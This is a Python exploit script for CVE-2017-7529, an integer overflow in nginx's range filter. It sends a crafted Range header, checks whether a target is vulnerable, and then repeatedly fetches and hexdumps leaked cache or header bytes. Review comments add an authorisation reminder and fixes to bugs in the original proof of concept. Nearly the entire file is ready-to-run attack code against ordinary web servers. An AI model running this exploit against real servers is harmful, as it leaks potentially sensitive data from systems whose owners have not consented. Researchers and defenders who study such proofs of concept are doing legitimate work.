import urllib.parse, requests, argparse
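# Colour output is optional: colorama/termcolor are imported best-effort and
# `colored` degrades to returning the plain text when either is missing.
# (The original had a module-level `global` statement here, which is a no-op
# at module scope, and defined `colored` as a one-line lambda.)
try:
    import colorama
    import termcolor

    colorama.init(autoreset=True)
except Exception:  # deliberate best-effort: any failure just disables colour
    termcolor = colorama = None


def colored(text, color="", dark=False):
    """Return *text* wrapped in terminal colour codes, or unchanged.

    Args:
        text: the string to decorate.
        color: termcolor colour name; an empty value means "white".
        dark: when True, add termcolor's "dark" attribute (dimmed text).

    Returns:
        The decorated string if both colorama and termcolor imported
        successfully, otherwise *text* exactly as given.
    """
    if not (termcolor and colorama):
        return text
    return termcolor.colored(text, color or "white", attrs=["dark"] if dark else [])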
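class Exploit(requests.Session):
    """HTTP session pre-loaded with the CVE-2017-7529 crafted Range header.

    The request sends two suffix byte-ranges whose lengths add up to just
    above 2**63 - 1 so that the sum overflows in nginx's range filter (the
    argparse description in this file summarises the advisory: nginx 0.5.6
    through 1.13.2, leak of potentially sensitive information).
    NOTE(review): public write-ups attribute the leaked bytes to cache-file
    metadata that precedes the body when proxy caching is on; that is not
    something this script checks, so confirm against the target's setup.
    Only point this at systems you are authorised to test.

    Args:
        url: target URL. A preliminary GET fetches its Content-Length so the
            first range can be sized from the real body length.
        timeout: per-request timeout in seconds (keyword-only). The original
            sent every request without one and could hang indefinitely.

    Raises:
        requests.RequestException: the preliminary GET failed.
        ValueError: the server returned a non-numeric Content-Length.
    """

    # Total of the two suffix-range lengths. 2**63 - 1 is 9223372036854775807,
    # so this total wraps when nginx adds the range lengths in a signed 64-bit
    # integer. Kept verbatim from the original PoC.
    _OVERFLOW_TOTAL = 9223372036854776000
    # Headroom added to Content-Length for the first range. Empirical constant
    # from the original PoC; its derivation is not documented here.
    _HEADROOM = 623
    # execute() stops once this many distinct leaked lines have been seen.
    _TARGET_LINES = 0x80

    def __init__(self, url, *, timeout=10.0):
        super().__init__()
        self.timeout = timeout
        self.target = urllib.parse.urlsplit(url)
        # Per-instance: the original kept `buffer` as a class attribute, so
        # every Exploit object shared (and polluted) one set of lines.
        self.buffer = set()
        probe = requests.get(url, timeout=timeout)
        # No Content-Length (e.g. chunked response) falls back to 0 + headroom.
        length = int(probe.headers.get("Content-Length", 0)) + self._HEADROOM
        # Computed arithmetically. The original spliced strings —
        # f"-9223372036854{776000 - length}" — which only yields the intended
        # 19-digit number while 776000 - length has exactly six digits.
        second = self._OVERFLOW_TOTAL - length
        # Replaces (not updates) the session headers, as the original did, so
        # requests' default User-Agent/Accept headers are not sent alongside.
        self.headers = {"Range": f"bytes=-{length},-{second}"}

    def check(self) -> bool:
        """Return True if the target looks vulnerable.

        One GET with the crafted Range header counts as a hit when the
        status is 206 and the *body* contains "Content-Range" — in an
        ordinary 206 that string appears only in the headers, so finding it
        in the body suggests leaked header material. Any request failure is
        reported as False rather than raised so --check stays quiet on
        unreachable hosts.
        NOTE(review): a server that honours both ranges with a
        multipart/byteranges body also places Content-Range lines in the
        body, so treat a positive as a lead and confirm with the hexdump.
        """
        try:
            response = self.get(self.target.geturl(), timeout=self.timeout)
        except Exception:
            return False
        # Compared on raw bytes so an undecodable binary leak cannot mask the hit.
        return response.status_code == 206 and b"Content-Range" in response.content

    def hexdump(self, data: bytes) -> None:
        """Print *data* 16 bytes per row: offset, hex bytes, printable ASCII."""
        for offset in range(0, len(data), 16):
            chunk = data[offset:offset + 16]
            hex_part = " ".join(f"{byte:02x}" for byte in chunk)
            text_part = "".join(chr(byte) if 32 <= byte <= 126 else "." for byte in chunk)
            print(colored(" - {:04x}: {:48} {}".format(offset, hex_part, text_part), dark=True))

    def execute(self, max_requests=None) -> None:
        """Report the check() verdict and, on a hit, collect and hexdump leaked lines.

        Repeats the crafted GET until _TARGET_LINES distinct CRLF-separated
        lines have been gathered, a request fails, Ctrl+C is pressed, or
        *max_requests* requests have been sent. Lines are de-duplicated via
        self.buffer, so a server that keeps returning identical content would
        otherwise spin forever; pass a cap to bound that. The default None
        keeps the original unbounded behaviour.

        Args:
            max_requests: optional upper bound on GETs sent in the loop.
        """
        vulnerable = self.check()
        # Uses self.target — the original read a module global `exploit` here,
        # which fails whenever the class is used outside this script's main.
        print(colored(f"[{'+' if vulnerable else '-'}] {self.target.netloc} is Vulnerable: {str(vulnerable).upper()}", "white" if vulnerable else "yellow"))
        if not vulnerable:
            return
        chunks = []
        total = 0
        sent = 0
        while len(self.buffer) < self._TARGET_LINES:
            if max_requests is not None and sent >= max_requests:
                break
            try:
                response = self.get(self.target.geturl(), timeout=self.timeout)
            except KeyboardInterrupt:
                print()
                print(colored("[!] Keyboard Interrupted! (Ctrl+C Pressed)", "red"))
                break
            except Exception as err:
                print()
                print(colored(f"[!] {type(err).__name__}:", "red"))
                print(colored(f" - {err}", "red", True))
                break
            sent += 1
            for line in response.content.split(b"\r\n"):
                if line not in self.buffer:
                    self.buffer.add(line)
                    chunks.append(line)
                    total += len(line)
            print(colored(f"[i] Receiving Data [{total} bytes] ..."), end="\r")
        # Joined once instead of repeated bytes concatenation in the loop.
        data = b"".join(chunks)
        if data:
            print()
            self.hexdump(data)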
if __name__ == "__main__":
    # Command line: one positional target URL, plus -c/--check to stop after
    # the vulnerability probe instead of dumping leaked data.
    parser = argparse.ArgumentParser(
        prog="CVE-2017-7529",
        description="Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.",
        epilog="By: en0f",
    )
    parser.add_argument("url", type=str, help="Target URL.")
    parser.add_argument("-c", "--check", action="store_true", help="Only check if Target is vulnerable.")
    args = parser.parse_args()
    try:
        # Kept as a module-level name: Exploit.execute() refers to `exploit`.
        exploit = Exploit(args.url)
        if not args.check:
            # Failures inside the dump loop get their own, more detailed report.
            try:
                exploit.execute()
            except Exception as err:
                print(colored(f"[!] {type(err).__name__}:", "red"))
                print(colored(f" - {err}", "red", True))
        else:
            vulnerable = exploit.check()
            print(colored(f"[{'+' if vulnerable else '-'}] {exploit.target.netloc} is Vulnerable: {str(vulnerable).upper()}", "white" if vulnerable else "yellow"))
    except KeyboardInterrupt:
        print(colored("[!] Keyboard Interrupted! (Ctrl+C Pressed)", "red"))
    except Exception as err:
        # Construction failures (bad URL, unreachable host) end up here.
        print(colored(f"[!] {urllib.parse.urlsplit(args.url).netloc}: {type(err).__name__}", "red"))